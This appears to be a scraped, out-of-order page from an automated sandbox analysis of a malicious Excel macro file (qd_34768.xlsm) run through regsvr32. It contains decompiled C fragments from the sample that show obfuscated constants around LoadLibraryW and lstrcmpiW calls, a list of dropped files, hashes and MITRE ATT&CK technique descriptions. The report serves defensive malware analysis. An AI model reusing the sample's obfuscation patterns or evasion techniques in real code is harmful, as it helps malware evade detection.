CloseServiceHandle.ADVAPI32(B8DEEC5C), ref: 0041A9E8

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 4e02c1c48d0c31cb8e0d19fe3d6ceb56ba7d4c566f63c9d2e18e2f176e99171d
Instruction ID: 6610919f723ccd22876917b5b64e48c6d1fc9ec41f6226c16731e841ca6f2fe3
Opcode Fuzzy Hash: 4e02c1c48d0c31cb8e0d19fe3d6ceb56ba7d4c566f63c9d2e18e2f176e99171d
Instruction Fuzzy Hash: 001157B5D0120CFBDF04EFE8D90A9AEBBB0EB14304F20C099E414A7290D7B95B14CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040D670 Relevance: 1.5, APIs: 1, Instructions: 39
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040D670(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t33;
				struct HINSTANCE__* _t39;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00402528(_t33);
				_v16 = 0xf4d06;
				_v12 = 0x5404e4;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0xb582df74;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x5ac6b88c;
				_v16 = 0x81adee;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x0009bc6e;
				_v8 = 0x5ad66e;
				_v8 = _v8 << 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x4437;
				_v8 = _v8 ^ 0x02d06663;
				E00406F64(0xfbae0770, __ecx, __ecx, 0xbfd2d08a, 0x8e);
				_t39 = LoadLibraryW(_a8); // executed
				return _t39;
			}

0x0040d676
0x0040d679
0x0040d67d
0x0040d67e
0x0040d683
0x0040d68d
0x0040d694
0x0040d698
0x0040d69f
0x0040d6a2
0x0040d6a9
0x0040d6b0
0x0040d6b4
0x0040d6b7
0x0040d6be
0x0040d6c5
0x0040d6c9
0x0040d6cd
0x0040d6d4
0x0040d6f5
0x0040d700
0x0040d705

APIs

LoadLibraryW.KERNEL32(0009BC6E), ref: 0040D700

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe9d2400959b978588cffa7e676de13edc4ae936bd89811698522b9798dabb0b
Instruction ID: eed0c2ff38b92a8373a19e1f8f62b4c8ef0f0f522fc953ec23c4cc93241e93ce
Opcode Fuzzy Hash: fe9d2400959b978588cffa7e676de13edc4ae936bd89811698522b9798dabb0b
Instruction Fuzzy Hash: 2E01F3B1C0020CFBCB05DFE5D94A89DBBB4EB00708F50C198E915A7291D7B55B58DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF03 Relevance: 1.3, APIs: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041BF03(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t37;
				int _t44;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00402528(_t37);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x8102d;
				_v12 = 0x85e3;
				_v12 = _v12 | 0xa30290e5;
				_v12 = _v12 ^ 0x155caa20;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01679a9a;
				_v8 = 0xba8e6c;
				_v8 = _v8 | 0xcfa86ffb;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xa8a49b93;
				_v8 = _v8 ^ 0xa8bae482;
				_v16 = 0x2eb53;
				_v16 = _v16 << 0xb;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xd31f440d;
				E00406F64(0xa2e0587d, __ecx, __ecx, 0xbfd2d08a, 0xf9);
				_t44 = lstrcmpiW(_a12, _a4); // executed
				return _t44;
			}

0x0041bf09
0x0041bf0c
0x0041bf0f
0x0041bf13
0x0041bf14
0x0041bf19
0x0041bf20
0x0041bf27
0x0041bf2e
0x0041bf35
0x0041bf3c
0x0041bf40
0x0041bf47
0x0041bf4e
0x0041bf55
0x0041bf59
0x0041bf60
0x0041bf67
0x0041bf6e
0x0041bf82
0x0041bf8a
0x0041bf9a
0x0041bfa8
0x0041bfad

APIs

lstrcmpiW.KERNEL32(00000000,01679A9A), ref: 0041BFA8

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: c3944f43cc7431900496b374259283eb27f27c53ab89578a9a2e616000e3f60d
Instruction ID: 1558dccecb051f94ee0587ef617e0747e6b6f483b05816c319fe3e134cfbd898
Opcode Fuzzy Hash: c3944f43cc7431900496b374259283eb27f27c53ab89578a9a2e616000e3f60d
Instruction Fuzzy Hash: 7611E3B1C1120DBFDF09DFA5D94A59EBFB4BB04308F10C098E426A2261D7B58B649F90

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qd_34768.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F230AC8.jpg

C:\Users\user\AppData\Local\Temp\Cab3198.tmp

C:\Users\user\AppData\Local\Temp\Tar3199.tmp

C:\Users\user\Desktop\~$qd_34768.xlsm

C:\Users\user\xewn.dll

C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy)

Static File Info

General

File Icon

Static OLE Info

General

Windows Analysis Report
qd_34768.xlsm

Function 10009530 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 301
memoryCOMMON

Function 003D31D5 Relevance: 11.7, Strings: 9, Instructions: 414
COMMONCrypto

Function 003C25E7 Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Function 003CB1A1 Relevance: 7.8, Strings: 6, Instructions: 284
COMMONCrypto

Function 003D39B8 Relevance: 6.5, Strings: 5, Instructions: 248
COMMONCrypto

Function 10064D73 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Function 003DE978 Relevance: 5.2, Strings: 4, Instructions: 214
COMMONCrypto

Function 003C8ED3 Relevance: 4.0, Strings: 3, Instructions: 253
COMMONCrypto

Function 003DFADC Relevance: 3.9, Strings: 3, Instructions: 184
COMMONCrypto

Function 003D8BA1 Relevance: 3.9, Strings: 3, Instructions: 175
COMMON

Function 003C3F40 Relevance: 2.7, Strings: 2, Instructions: 186
COMMONCrypto

Function 003D7A53 Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Function 003CDF44 Relevance: 1.5, Strings: 1, Instructions: 279
COMMONCrypto

Function 10021DEA Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 003C5AC9 Relevance: 1.3, Strings: 1, Instructions: 99
COMMONCrypto

Function 10065239 Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Function 1001FAE3 Relevance: 7.5, APIs: 5, Instructions: 38
memoryCOMMON

Function 10001212 Relevance: 7.2, APIs: 4, Instructions: 1193
COMMON

Function 10020212 Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Function 003C9A53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78
fileCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre